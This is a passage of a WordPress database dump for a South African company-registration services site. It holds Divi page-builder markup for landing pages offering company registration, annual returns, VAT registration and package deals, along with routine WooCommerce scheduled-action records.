button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><span>All companies (including external companies) and close corporations are required by law to file their annual returns with the CIPC on an annual basis, within a prescribed time period. The purpose for the filing of such annual returns is to confirm whether a company or close corporation is still in business/trading, or if it will be in business in the near future.</span></p>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register For Tax\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/tax-registrations\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p>Any person that carries on a business may register for VAT. The term person is not only limited to companies but also includes, amongst others, individuals, partnerships, trust funds, foreign donor funded projects and municipalities.</p>\n<p>It is<span> </span><span>mandatory</span><span> </span>for a person to register for VAT if sales made from selling goods or services is in excess of R1 million in any consecutive twelve month period.</p>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Combo Deals\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/combo-deals-2\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\" button_url=\"https://companyregistration.online/combo-deals-2\"][/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><b>Each Company Is Unique In Its Own Right</b></p>\n<p><b></b></p>\n<p>Customize your package and save <span style=\"color: #ff00ff;\">BIG</span></p>[/et_pb_toggle][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"2_3,1_3\" _builder_version=\"3.26.6\" width=\"89%\" max_width=\"1490px\" module_alignment=\"center\" custom_margin=\"|217px||221px||\"][et_pb_column type=\"2_3\" _builder_version=\"3.26.6\"][et_pb_shop type=\"product_category\" posts_number=\"6\" include_categories=\"8,7,17\" columns_number=\"3\" _builder_version=\"3.26.6\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-developer-illustration-small-03-1.png\" _builder_version=\"3.26.6\" width=\"100%\" max_width=\"103%\" module_alignment=\"center\" height=\"568px\" custom_padding=\"||11px|||\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.26.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" width=\"93%\" module_alignment=\"center\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.26.6\" text_font=\"||||||||\" text_font_size=\"21px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_text_align=\"center\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>Not Exactly Sure What To Do?</h2>\n<p style=\"text-align: center;\">Fill our contact form and a consultant will get contact you to better discuss what services your company requires</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.23\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"1%\" always_center_on_mobile=\"off\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.26.6\"]<iframe frameborder=\"0\" style=\"height: 720px; width: 99%; border: none;\" src=\"https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\"></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-19 09:25:24','2019-08-19 07:25:24','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32978,0,'2019-08-19 08:42:36','2019-08-19 08:42:36','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5a6118b218e7.15699308-XbqM3EJL1K1RLFr1R7JMplmXTw9tpQe4','','','2019-08-19 10:43:04','2019-08-19 08:43:04','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32978',0,'scheduled-action','',3),(32979,0,'2019-08-19 08:42:36','2019-08-19 08:42:36','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5a6118c94c65.41277554-wD2PzqWekiqdOGKO3uJam5cWFeT28fMT','','','2019-08-19 10:43:04','2019-08-19 08:43:04','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32979',0,'scheduled-action','',3),(32993,0,'2019-08-19 14:26:49','2019-08-19 14:26:49','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5ab5e1d39222.03931280-VoEvXVnw2C0GysIG0I93dVpZJdZVJXaG','','','2019-08-19 16:44:49','2019-08-19 14:44:49','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32993',1,'scheduled-action','',3),(32994,0,'2019-08-19 14:26:49','2019-08-19 14:26:49','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5ab5e1f32453.57556520-jJ0VijOY6qK7ICyIxS3Ec8ife7D4Av6V','','','2019-08-19 16:44:49','2019-08-19 14:44:49','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32994',1,'scheduled-action','',3),(32996,0,'2019-08-19 15:44:50','2019-08-19 15:44:50','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5ac46bcf3538.41021011-B3roXR7yPV8xzn3xZxP2CBs8tIn1pWxo','','','2019-08-19 17:46:51','2019-08-19 15:46:51','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32996',0,'scheduled-action','',3),(32998,0,'2019-08-19 16:46:51','2019-08-19 16:46:51','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5ad644e025c2.71052213-4FWUXE1T8Dae9ITM6UB6woGRZ9xSalp3','','','2019-08-19 19:03:00','2019-08-19 17:03:00','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32998',0,'scheduled-action','',3),(33000,0,'2019-08-19 18:03:00','2019-08-19 18:03:00','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5aeb9c3b3152.85502286-IzsYla0FRX27TN6u0q3YaZsf4cki3jiK','','','2019-08-19 20:34:04','2019-08-19 18:34:04','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33000',0,'scheduled-action','',3),(33002,0,'2019-08-19 19:34:04','2019-08-19 19:34:04','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5afab2953ea9.21900629-4xeqgxupAmA6cYqoHcGBsngmE0jZRjdJ','','','2019-08-19 21:38:26','2019-08-19 19:38:26','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33002',1,'scheduled-action','',3),(33004,0,'2019-08-19 20:38:26','2019-08-19 20:38:26','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5b09b9c21db3.44682343-W0gx1K3bxciONScm38JSFs6LxRqalT33','','','2019-08-19 22:42:33','2019-08-19 20:42:33','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33004',1,'scheduled-action','',3),(33006,0,'2019-08-19 21:42:33','2019-08-19 21:42:33','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5b197aa4dd29.89439112-Xbs2jADS4Dvs4BRSr7mMCbr18FrvUx9M','','','2019-08-19 23:49:46','2019-08-19 21:49:46','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33006',1,'scheduled-action','',3),(33008,0,'2019-08-19 22:49:46','2019-08-19 22:49:46','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5b2e179065d9.91340163-8mEPnWBSSil82InEzEOD7sYLsVvbzb15','','','2019-08-20 01:17:43','2019-08-19 23:17:43','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33008',1,'scheduled-action','',3),(33010,0,'2019-08-20 00:17:43','2019-08-20 00:17:43','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5b50262e8ef9.46314678-vSJZZZCa6DwCoupWshfF2IMtVevVX84D','','','2019-08-20 03:43:02','2019-08-20 01:43:02','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33010',1,'scheduled-action','',3),(33012,0,'2019-08-20 02:43:02','2019-08-20 02:43:02','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5b63f809b202.98362274-NAMd7V3qRDcEp5gpsBXqF38v9yEMmkrR','','','2019-08-20 05:07:36','2019-08-20 03:07:36','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33012',1,'scheduled-action','',3),(33014,0,'2019-08-20 04:07:36','2019-08-20 04:07:36','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5b794524ab87.17570425-T9RXQqneQhc6hqwd1waz7NRKMKi3h68n','','','2019-08-20 06:38:29','2019-08-20 04:38:29','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33014',1,'scheduled-action','',3),(33016,0,'2019-08-20 05:38:29','2019-08-20 05:38:29','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5b8d6d0df9b6.99469947-p69rDvjA1VTMfL6H6gd4E1TmZOodfJKC','','','2019-08-20 08:04:29','2019-08-20 06:04:29','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33016',1,'scheduled-action','',3),(33018,0,'2019-08-20 07:04:29','2019-08-20 07:04:29','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5ba503b5d8a5.50024454-hEX2FOBFmp8rU9R05cA5ZYNb6y0C3I3d','','','2019-08-20 09:45:07','2019-08-20 07:45:07','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33018',1,'scheduled-action','',3),(33020,0,'2019-08-20 08:45:07','2019-08-20 08:45:07','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5bb80c5c49a7.12602007-57APeYZjnC7DdZxzKelVZ9k8IE34kJmi','','','2019-08-20 11:06:20','2019-08-20 09:06:20','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33020',1,'scheduled-action','',3),(33025,0,'2019-08-20 12:05:02','2019-08-20 12:05:02','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5be8a51a9e60.83708544-D8orRbzZQJHoRvWED6gnih2LHHTsUnVW','','','2019-08-20 14:33:41','2019-08-20 12:33:41','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33025',1,'scheduled-action','',3),(33027,0,'2019-08-20 13:33:41','2019-08-20 13:33:41','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5c00b2080390.29399171-KZOvBJoNAWutoeksLAbrVBhqPbc1kUlE','','','2019-08-20 16:16:18','2019-08-20 14:16:18','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33027',1,'scheduled-action','',3),(33029,0,'2019-08-20 15:16:18','2019-08-20 15:16:18','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5c2ca489d796.10975205-OEOtvcnlVeAJQ9z4aKbsTIhsjCRhXPCS','','','2019-08-20 19:23:48','2019-08-20 17:23:48','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33029',1,'scheduled-action','',3),(32987,3,'2019-08-19 13:21:35','2019-08-19 11:21:35','{\n    \"et_divi[heading_font]\": {\n        \"value\": \"Encode Sans Semi Condensed\",\n        \"type\": \"option\",\n        \"user_id\": 3,\n        \"date_modified_gmt\": \"2019-08-19 11:21:31\"\n    },\n    \"et_divi[body_font]\": {\n        \"value\": \"Encode Sans Semi Condensed\",\n        \"type\": \"option\",\n        \"user_id\": 3,\n        \"date_modified_gmt\": \"2019-08-19 11:21:31\"\n    }\n}','','','trash','closed','closed','','49134c57-2599-44cb-9b19-a51db6b3d6ee','','','2019-08-19 13:21:35','2019-08-19 11:21:35','',0,'https://companyregistration.online/?p=32987',0,'customize_changeset','',0),(32990,3,'2019-08-19 13:26:49','2019-08-19 11:26:49','[et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.26.6\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_divider show_divider=\"off\" _builder_version=\"3.26.6\" height=\"125px\"][/et_pb_divider][et_pb_text _builder_version=\"3.26.6\" text_font=\"|700|||||||\" header_font=\"|700|||||||\" header_text_align=\"center\" header_font_size=\"47px\"]<h1 style=\"text-align: center;\">What Would You Like To Do ?</h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/working-free-img.jpg\" _builder_version=\"3.26.6\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"3.26.6\" width=\"98%\" max_width=\"1347px\" module_alignment=\"center\" custom_margin=\"|223px||427px||\"][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register A Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/company-registrations/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" background__hover_enabled=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color__hover=\"on\" header_text_color__hover_enabled=\"on\" header_text_color__hover=\"#ffffff\"][/et_pb_cta][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Maintain My Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/maintaining-your-company/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_enable_color__hover=\"on\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" background_color__hover=\"rgba(196,13,126,0.64)\" background__hover_enabled=\"on\"][/et_pb_cta][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register For Tax\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/tax-registrations\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_enable_color__hover=\"on\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" background_color__hover=\"rgba(196,13,126,0.64)\" background__hover_enabled=\"on\"][/et_pb_cta][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Combo Deals\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/combo-deals-2\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_enable_color__hover=\"on\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" background_color__hover=\"rgba(196,13,126,0.64)\" background__hover_enabled=\"on\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.26.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" width=\"93%\" module_alignment=\"center\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.26.6\" text_font=\"Encode Sans Semi Condensed||||||||\" text_font_size=\"21px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Encode Sans Semi Condensed|600|||||||\" header_2_text_align=\"center\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>Not Exactly Sure What To Do?</h2>\n<p style=\"text-align: center;\">Fill our contact form and a consultant will get contact you to better discuss what services your company requires</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.23\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"1%\" always_center_on_mobile=\"off\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.26.6\"]<iframe frameborder=\"0\" style=\"height: 720px; width: 99%; border: none;\" src=\"https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\"></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" 